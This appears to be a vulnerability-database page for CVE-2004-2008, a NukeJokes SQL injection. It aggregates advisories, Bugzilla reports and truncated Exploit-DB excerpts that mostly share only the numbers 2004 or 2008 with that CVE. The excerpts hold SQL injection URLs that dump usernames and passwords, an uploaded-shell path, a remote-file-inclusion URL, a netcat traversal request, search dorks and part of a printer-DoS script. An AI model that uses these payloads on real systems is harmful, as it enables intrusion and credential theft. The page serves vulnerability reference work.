CVE-2004-2008
Published 2004-05-08
Priority P4 · medium · 4.6 (CVSS 2.0)
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT · EPSS 1.71% (74.5th percentile)
SQL injection vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to execute arbitrary SQL via the jokeid parameter.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adam_webb | nukejokes | — | — |
| adam_webb | nukejokes | — | — |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 4.6 | MEDIUM | AV:L/AC:L/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 10.0 | CRITICAL | — |
GHSA · ghsa_unreviewed · 2022-04-29
CVE-2004-2008 [MEDIUM] GHSA-xvhq-4mp3-f354: SQL injection vulnerability in modules
SQL injection vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to execute arbitrary SQL via the jokeid parameter.
Red Hat · vendor_redhat · 2013-04-15 · CVSS 4.9
CVE-2013-1922 [MEDIUM] kvm: qemu-nbd block format auto-detection vulnerability
qemu-nbd in QEMU, as used in Xen 4.2.x, determines the format of a raw disk image based on the header, which allows local guest OS administrators to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted, a different vulnerability than CVE-2008-2004.
Statement: Not vulnerable.
This issue does not affect versions of kvm and xen packages as shipped with Red Hat Enterprise Linux 5. This issue does not affect versions of qemu-kvm packages as shipped with Red Hat Enterprise Linux 5 and 6.
Package: kvm (Red Hat Enterprise Linux 5) - Not affected
Package: qemu-kvm (Red Hat Enterprise Linux 6) - Not affected
Red Hat · vendor_redhat · 2008-11-19 · CVSS 2.6
CVE-2008-5302 [LOW] perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
Race condition in the rmtree function in File::Path 1.08 and 2.07 (lib/File/Path.pm) in Perl 5.8.8 and 5.10.0 allows local users to create arbitrary setuid binaries via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error related to CVE-2005-0448. It is different from CVE-2008-5303 due to affected versions.
Red Hat · vendor_redhat · 2008-11-19 · CVSS 2.6
CVE-2008-5303 [LOW] perl: File::Path rmtree race condition (CVE-2004-0452) reintroduced after upstream rebase to 5.8.8-1
Race condition in the rmtree function in File::Path 1.08 (lib/File/Path.pm) in Perl 5.8.8 allows local users to delete arbitrary files via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error related to CVE-2005-0448. It is different from CVE-2008-5302 due to affected versions.
Red Hat · vendor_redhat · 2008-08-07 · CVSS 2.1
CVE-2008-1945 [LOW] qemu/kvm/xen: add image format options for USB storage and removable media
QEMU 0.9.0 does not properly handle changes to removable media, which allows guest OS users to read arbitrary files on the host OS by using the diskformat: parameter in the -usbdevice option to modify the disk-image header to identify a different format, a related issue to CVE-2008-2004.
Red Hat · vendor_redhat · 2008-06-20 · CVSS 2.6
CVE-2008-2827 [LOW] perl: insecure use of chmod in rmtree
The rmtree function in lib/File/Path.pm in Perl 5.10 does not properly check permissions before performing a chmod, which allows local users to modify the permissions of arbitrary files via a symlink attack, a different vulnerability than CVE-2005-0448 and CVE-2004-0452.
Statement: Not vulnerable. This issue did not affect the versions of perl as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5, Red Hat Application Stack 1, or Solaris versions of Red Hat Directory Server 7.1 and 8, Certificate System 7.x.
Red Hat · vendor_redhat · 2008-04-27 · CVSS 4.9
CVE-2008-2004 [MEDIUM] qemu/kvm/xen: qemu block format auto-detection vulnerability
The drive_init function in QEMU 0.9.1 determines the format of a raw disk image based on the header, which allows local guest users to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted.
Red Hat · vendor_redhat · 2008-04-01 · CVSS 10.0
CVE-2008-1374 [CRITICAL] cups: incomplete fix for CVE-2004-0888 / CVE-2005-0206
Integer overflow in pdftops filter in CUPS in Red Hat Enterprise Linux 3 and 4, when running on 64-bit platforms, allows remote attackers to execute arbitrary code via a crafted PDF file. NOTE: this issue is due to an incomplete fix for CVE-2004-0888.
Red Hat · vendor_redhat · CVSS 7.5
CVE-2008-1468 [HIGH] namazu XSS flaw
Cross-site scripting (XSS) vulnerability in namazu.cgi in Namazu before 2.0.18 allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input, related to failure to set the charset, a different vector than CVE-2004-1318 and CVE-2001-1350. NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB · exploitdb · 2016-05-31 · CVSS 9.8
CVE-2016-2004 [CRITICAL] HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
---
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
require 'openssl'
class MetasploitModule "HP Data Protector Encrypted Communication Remote Command Execution",
'Description' => %q{
This module exploits a well known remote code execution exploit after es
Exploit-DB · exploitdb · 2016-05-26 · CVSS 9.8
CVE-2016-2004 [CRITICAL] HP Data Protector A.09.00 - Arbitrary Command Execution
---
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
# This proof of concept demonstrates that enabling encrypted control communication on
# Data Protector agents does not provide any additional security.
# As it provides no authentication, it is not a viable workaround to prevent the
# exploitation of well known Data Protector issues such as CVE-2014-2623
#
# This exploit establishes an unauthenticated encrypted communication channel to
# a Data Protector Agent and
Exploit-DB · exploitdb · 2010-06-06
greeting card - Arbitrary File Upload
---
# Exploit Title: [greeting card Remote Upload Vulnerability]
# Date: [04/06/2010]
# Author: [Mr.Benladen]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : [email protected]
Mr.Benladen cr3w
Exploit-DB · exploitdb · 2010-04-09
GarageSales - Arbitrary File Upload
---
# Exploit Title: [GarageSales Remote Upload Vulnerability]
# Date: [06/04/2010]
# Author: [saidinh0]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : [email protected]
###################################################
Introduction:
Hi everybody, this is my first bug (Remote Upload Vulnerability) and I hope you like it :p
###################################################
[Dork ]: inurl:post.php?Category=Garage
{exploit} : http://127.0.0.1/post.php?Category=Garage
Example : http://[site]/searchgarage/post.php?Category=Garage
After you have uploaded your shells , you will find it in this Path : http://[site]/up_files/YouRShell.php
Example : http://[site]/searchgarage/up_fi
Exploit-DB · exploitdb · 2008-10-06 · CVSS 7.8
CVE-2008-4421 [HIGH] Hammer Software MetaGauge 1.0.0.17 - Directory Traversal
---
Title: MetaGauge 1.0.0.17 Directory Traversal
Vendor: Hammer Software
Vendor URL: www.Hammer-Software.com
Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.
Description:
A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server.
Example:
C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1
Patch Information:
Hammer has addressed the issue in the latest version of MetaGauge:
http://dl.hammer-software.com/metagauge.zip
CVE: CVE-2008-4421
Credit:
Brad Antoniewicz
[email protected]
# milw0rm.com [2008-10-06]
Exploit-DB · exploitdb · 2008-10-05
CVE-2008-4516 Galerie 3.2 - 'pic' WBB Lite Addon Blind SQL Injection
---
#!/usr/bin/perl
#####################################################################################
#
# Galerie 3.2 (galerie.php) Remote "Blind" SQL Injection
#
# found by: J0hn.X3r
# exploit written by: J0hn.X3r and electron1x
# Date: 05.10.2008
# Dork: "Galerie 3.2 © 2004 by progressive"
#
# Contact:
# J0hn.X3r
# [+] ICQ: 573813
# [+] Mail: J0hn.X3r[at]gmail.com
# electron1x
# [+] Mail: electron1x *at* mail *dot* ru
#
# Greetz to: nexos, Barbers, -tmh-, Patrick_B, Sector, Loader007, n00bor
# Mac_Hack, Five-Three-Nine, f0Gx, bizzit, h0yt3r, no_swear_ftW,
# Lidloses_Auge, Sys-Flaw, Free-hack, Universal Crew & rest :-)
#
#####################################################################################
#
# First, Galerie 3.2
Exploit-DB · exploitdb · 2008-09-16
CVE-2008-7011 Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service
---
source: https://www.securityfocus.com/bid/31205/info
Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation.
An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users.
The following applications using the engine are vulnerable:
Unreal Tournament 3.1.3
Unreal Tournament 2003
Unreal Tournament 2004
Dead Man's Hand
Pariah
WarPath
Postal 2
Shadow Ops
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32386.zip
Exploit-DB · exploitdb · 2008-09-10
CVE-2008-4699 Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method
---
arg1="C:/WINDOWS/system32/calc.exe"
target.ExecutePreferredApplication arg1
# milw0rm.com [2008-09-10]
Exploit-DB · exploitdb · 2008-08-03
CVE-2008-3571 Xerox Phaser 8400 - Remote Reboot (Denial of Service)
---
#!/usr/bin/perl
# carved-out by: crit3rion, just making th3 world a b3tt3r plac3!
# Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$*&*! s0ck3t)
# Make: Xerox
# Model: Phaser 8400
# Firmware: 03/03/2004
#
# What's the deal?
# Apparently, if you send an empty packet to a Xerox Phaser 8400 printer
# the printer will reboot. Tested successfully on four printers.
#
# Let's not leave our maliciousness open to exploitation and errors!
use strict;
use warnings;
use IO::Socket::INET;
# What's your printer's IP Address?
print "Please enter the printers IP:\n";
my $ipaddr = <STDIN>;
chomp $ipaddr;
# Let's setup the connection...
my $socket = IO::Socket::INET->new(
PeerPort => 1900,
PeerAddr => $ipaddr,
Proto =>
Exploit-DB · exploitdb · 2008-07-30
CVE-2008-3396 Unreal Tournament 2004 - Null Pointer Remote Denial of Service
---
source: https://www.securityfocus.com/bid/30427/info
Unreal Tournament 2004 is prone to a remote denial-of-service vulnerability because the application fails to handle NULL-pointer exceptions.
An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
This issue affects Unreal Tournament 2004 v3369 and prior versions.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32125.zip
Exploit-DB · exploitdb · 2008-07-08
CVE-2008-6923 Joomla! Component Content 1.0.0 - 'itemID' SQL Injection
---
Joomla Component com_content SQL Injection Vulnerability
Author : unknown_styler
Dork : inurl:com_content
POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*
Greetings : h4ck-y0u.org
side note:
Página de contenido
Projecte Joomla!
July 2004
(C) 2005 Open Source Matters. All rights reserved.
http://www.gnu.org/copyleft/gpl.html GNU/GPL
[email protected]
www.joomla.org
1.0.0
# milw0rm.com [2008-07-08]
Exploit-DB · exploitdb · 2008-05-12
CVE-2008-5215 ClanLite 2.x - SQL Injection / Cross-Site Scripting
---
########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################
ClanLite V2 SQL inj. & XSS
dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005
dork: Themed By Ray © 2003, 2004 iOptional
readme script
/****************************************************************************
* Fichier : *
* Copyright : (C) 2004 ClanLite V2 *
* Email : [email protected] *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
******************************************************************
Exploit-DB · exploitdb · 2008-03-07
CVE-2008-0118 Microsoft Office 2000/2003/2004/XP - File Memory Corruption
---
source: https://www.securityfocus.com/bid/28146/info
Microsoft Office is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open a malicious Office file.
Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31361.tgz
Exploit-DB · exploitdb · 2008-01-23
CVE-2008-0464 Aconon Mail 2004 - Directory Traversal
---
Application: aconon(R) Mail
Affected versions: probably all known, tested against 2007 Enterprise SQL 11.7.0 and 2004 Enterprise SQL 11.5.1
Affected platforms: every platform Aconon runs on (Win32, Linux, Solaris ...)
Exploitation: remote
Description: Aconon Mail is a commercial newsletter software, providing a feature-rich web interface for both users and administrators. This includes a publicly available archive of sent newsletters. Those archived e-mails may be accessed through the web browser, processed by a template engine. The template used may be overwritten by any user by modifying the HTTP GET "template" form parameter. This parameter is checked against code injection, but not against directory traversal.
Proof of Concept:
http://www.aco
Exploit-DB · exploitdb · 2008-01-05
CVE-2008-0187 samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
---
Title:samPHPweb (songinfo.php) Remote SQL Injection
Script:samPHPweb
Download:http://www.spacialaudio.com/download/samPHPweb.zip
Bug:songinfo.php
Author:BackDoor
Dork1:inurl:samPHPweb/playing.php
Dork2:This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
Exploit:
www.victim.com/scriptpath/songinfo.php?songid=-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,password,user,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/**/from/**/mysql.user
# milw0rm.com [2008-01-05]
Exploit-DB · exploitdb · 2008-01-04
CVE-2008-0143 samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
---
+______________________________________________By Crackers_Child___________________________________________+
*
*
* [~] Script.......: samPHPweb
* [~] Page.........: http://support.spacialaudio.com/forums/viewforum.php?f=22 & http://www.spacialaudio.com/
* [~] Author.......: Crackers_Child | [email protected] & [email protected]
* [~] Class........: Remote File Include Vulnerability
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions
* [~] Dork.........: This page was produced using SAM2 (Streaming Audio Manager)
+____________________________________
Exploit-DB · exploitdb · 2006-10-04
CVE-2008-1609 JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
---
#===========================================================================================
#JAF CMS Remote file include (website)
#===========================================================================================
#
#Script name : JAF CMS
#
#Version : 4.0
#
#===========================================================================================
#Vulnerable Code :
#
# if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
#
#===========================================================================================
#Dork : powered by JAF CMS © 2004 - 2006
#
#Exploit :
#(1)
#http://www.site.com/[jmf_path]/module/forum/main.php?id=1&main_dir=http://www.milw0rm.com/index.php?&
#(2)
#http://ww
Exploit-DB · exploitdb · 2004-05-08
CVE-2004-2008 Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection
---
source: https://www.securityfocus.com/bid/10306/info
It has been reported that the NukeJokes module is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input.
Multiple SQL injection issues exist due to a failure of the application to do any sanitization on user input prior to using the offending input in an SQL query.
These SQL issues may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash, or to corruption of database data.
Multiple cross-site scripting vulnerabilities have been reported to exist due to a fai
Unit42 · blogs_unit42 · 2020-07-21 · CVSS 10.0
CVE-2020-1350 [CRITICAL] Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
## Executive Summary
In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.
This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53/TCP. Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading to remote code execution.
This vulnerability only affects Windows DNS and the following builds of the Microsoft Windows operating system (OS):
- Windows Server 2008/2008 R2
- Windows Server 2012/2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server version 1803/1903/1909/2004 (Server Core installation)
Bugzilla · bugzilla · 2013-03-19 · CVSS 4.9
CVE-2013-1922 [MEDIUM] qemu, qemu-kvm, kvm: qemu-nbd block format auto-detection vulnerability
A security flaw was found in the way qemu-nbd, the QEMU Disk Network Block Device server tool of QEMU, performed detection of image formats (the image format was previously autodetected). A guest operating system administrator could write a header to a particular raw disk image, describing a format other than the original one for that disk image, leading to a scenario in which, after a restart of that guest, QEMU would detect the new format of the image and could allow the guest to read any file on the host if QEMU was sufficiently privileged.
A different vulnerability than CVE-2008-2004.
Discussion:
Acknowledgements:
This issue was found by Daniel Berrange of Red Hat.
---
Created attachment 712650
P
Bugzilla · bugzilla · 2009-06-19 · CVSS 5.0
CVE-2009-1887 [MEDIUM] net-snmp: DoS (division by zero) via SNMP GetBulk requests
It was discovered that a remote attacker can cause net-snmp's snmpd to crash via specially crafted SNMP GetBulk requests that trigger a division by zero in the following code:
if (maxbulk > maxresponses / r)
    maxbulk = maxresponses / r;
This code was added as part of the fix for CVE-2008-4309 (bug #469349). This problem never affected upstream net-snmp versions, thanks to the following upstream commit from 2004:
http://net-snmp.svn.sourceforge.net/viewvc/net-snmp/trunk/net-snmp/agent/snmp_agent.c?r1=9583&r2=9695
This upstream change is part of the net-snmp packages shipped in Red Hat Enterprise Linux 4 and later. Therefore this division-by-zero DoS only affects net-snmp in Red Hat Enterprise Linux 3.
Discussion:
This i
Bugzilla · bugzilla · 2008-11-28 · CVSS 2.6
CVE-2008-5302 [LOW] perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
Created attachment 325021
Our perl-5.8.0-CAN-2005-0448-rmtree.patch applied against perl_5.8.0-90.4
Common Vulnerabilities and Exposures originally assigned the identifier CVE-2005-0448 to the following vulnerability:
Race condition in the rmtree function in File::Path.pm in Perl before 5.8.4 allows local users to create arbitrary setuid binaries in the tree being deleted, a different vulnerability than CVE-2004-0452.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0448
It was discovered that after the upstream perl rebase to 5.8.8-1, this issue was reintroduced (it seems upstream didn't apply the fix for CVE-2005-0448).
This issue already fixed again in perl-5.1
Bugzilla · bugzilla · 2008-06-24 · CVSS 2.6
CVE-2008-2827 [LOW] perl: insecure use of chmod in rmtree
Common Vulnerabilities and Exposures assigned the identifier CVE-2008-2827 to the following vulnerability:
The rmtree function in lib/File/Path.pm in Perl 5.10 does not properly check permissions before performing a chmod, which allows local users to modify the permissions of arbitrary files via a symlink attack, a different vulnerability than CVE-2005-0448 and CVE-2004-0452.
References:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487319
http://rt.cpan.org/Public/Bug/Display.html?id=36982
Discussion:
Created attachment 310113
Test case extracted from CPAN bug report
---
This issue did not affect the versions of perl as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5, Red Hat Application Stack 1 and Fedora 8.
---
Propose
Bugzilla · bugzilla · 2008-03-20 · CVSS 10.0
CVE-2008-1374 [CRITICAL] cups: incomplete fix for CVE-2004-0888 / CVE-2005-0206
It was discovered that the patch applied to cups packages as shipped in Red Hat Enterprise Linux 3 and 4 to address security issues in xpdf code known as CVE-2004-0888 / CVE-2005-0206 was incomplete.
On certain platforms, a malicious PDF file could still cause a crash or possibly code execution when processed by the pdftops filter.
This issue affects 64-bit platforms. cups packages in Red Hat Enterprise Linux 5 are not affected by this problem.
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0206.html
References:
http://marc.info/?l=bugtraq&m=108404714232579&w=2
http://secunia.com/advisories/11579
http://www.securityfocus.com/bid/10306
http://www.waraxe.us/index.php?modname=sa&id=28
https://exchange.xforce.ibmcloud.com/vulnerabilities/16099
Published: 2004-05-08